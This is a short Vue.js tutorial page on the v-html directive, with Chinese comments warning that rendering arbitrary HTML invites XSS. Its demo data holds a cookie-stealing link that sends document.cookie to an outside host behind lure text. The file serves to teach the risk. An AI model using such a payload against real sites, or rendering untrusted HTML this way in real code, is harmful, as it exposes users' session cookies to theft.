<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <title>v-html_指令</title>
    <script src="../js/vue.js"></script>
  </head>
  <body>
    <!--
        v-html指令:
            1.作用：向指定节点中渲染包含html结构的内容。
            2.与插值语法的区别：
                (1).v-html会替换掉节点中所有的内容，{{xxx}}则不会。
                (2).v-html可以识别html结构。
            3.严重注意：v-html有安全性问题！！！！
                (1).在网站上动态渲染任意HTML是非常危险的，容易导致XSS攻击。
                (2).一定要在可信的内容上使用v-html，永不要用在用户提交的内容上！
    -->

    <div id="root">
      <h3 v-text="str"></h3>
      <h3 v-html="str"></h3>
      <h3 v-html="str2"></h3>
    </div>
  </body>
  <script>
    Vue.config.productionTip = false;

    new Vue({
      el: "#root",
      data: {
        str: "<i>吃饭</i>",
        str2: '<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>快来看看，好东西！</a>',
      },
    });
  </script>
</html>
